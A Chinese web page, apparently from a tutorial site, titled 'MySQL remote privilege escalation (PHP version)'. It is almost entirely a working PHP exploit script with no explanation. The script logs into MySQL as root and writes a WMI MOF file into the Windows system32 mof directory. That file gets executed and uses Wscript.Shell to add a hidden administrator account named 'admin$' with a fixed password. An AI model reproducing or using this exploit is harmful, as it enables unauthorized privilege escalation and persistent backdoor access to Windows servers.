栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > PHP

MySQL远程提权php版

PHP 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

MySQL远程提权php版

  

$mysql_server_name='localhost';

$mysql_username='root';

$mysql_password='';

$mysql_database='mysql';

$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);

$cmdshell="net user admin$ qwe!@#123qwe /add";

$payload = "#pragma namespace("\\\\.\\root\\subscription")

  

instance of __EventFilter as $EventFilter

{

EventNamespace = "Root\\Cimv2";

Name = "filtP2";

Query = "Select * From __InstanceModificationEvent "

"Where TargetInstance Isa \"Win32_LocalTime\" "

"And TargetInstance.Second = 5";

QueryLanguage = "WQL";

};

  

instance of ActivescriptEventConsumer as $Consumer

{

Name = "consPCSV2";

scriptingEngine = "Jscript";

scriptText =

"var WSH = new ActiveXObject(\"Wscript.Shell\")\nWSH.run(\"$cmdshell\")";

};

  

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};";

mysql_select_db($mysql_database,$conn);

$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";

$result=mysql_query($sql);

mysql_close($conn);

?>


转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/227942.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号